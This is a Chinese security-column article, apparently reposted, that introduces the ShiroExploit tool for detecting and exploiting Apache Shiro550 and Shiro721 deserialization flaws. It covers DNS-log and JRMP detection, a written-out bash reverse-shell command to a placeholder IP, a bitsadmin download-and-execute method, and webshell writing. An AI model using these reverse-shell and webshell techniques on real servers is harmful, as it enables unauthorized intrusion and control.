支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测,支持简单回显。项目地址
https://github.com/feihong-cs/ShiroExploit
Shiro550
无需提供rememberMe Cookie,Shiro721
需要提供一个有效的rememberMe CookieShiro550
无需选择操作系统类型,Shiro721
需要选择操作系统类型使用 ceye.io 进行漏洞检测
URLDNS
筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload使用 dnslog.cn 进行漏洞检测
dnslog.cn
申请一个 DNS Record。URLDNS
筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload使用 JRMP + dnslog 进行漏洞检测
java -cp ShiroExploit.jar com.shiroexploit.server.BasicHTTPServer [HttpSerivce Port] [JRMPListener Port]
开启HttpService/JRMPListener,并按照要求填入相应 IP 和端口HTTPService
默认监听 8080
端口,JRMPListener
默认监听 8088
端口JRMP
的方式进行漏洞检测,可以显著减小 cookie 大小URLDNS
筛选出唯一 Key,然后使用 JRMP
依次为各个 Gadget 生成对应的 JRMPListener使用回显进行漏洞检测
https://blog.csdn.net/fnmsd/article/details/106709736
介绍的方式实现回显,在本地可以测试成功,但是在实际环境中基本不成功(可能是我的姿势有问题,欢迎探讨),所以目前是通过读写文件的方式实现回显,后期可能会加入其它方式反弹shell(linux)
采用 bash -i >& /dev/tcp/1.2.3.4/443 0>&1
的方式反弹 shell反弹shell(Windows)
采用 bitsadmin
下载指定 URL 的 exe 文件并执行的方式获取 shell获取Webshell
可以在能够回显的情况下直接在使用者给出的路径(目录需要真实存在)下写入 webshell, webshell 名称和后缀名由使用者自行指定,webshell 的内容从 config 目录下的 shell.jsp 中读取怕冷的企鹅
给予本项目的技术支持。项目地址
https://github.com/feihong-cs/ShiroExploit
本文作者:Timeline Sec
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/142504.html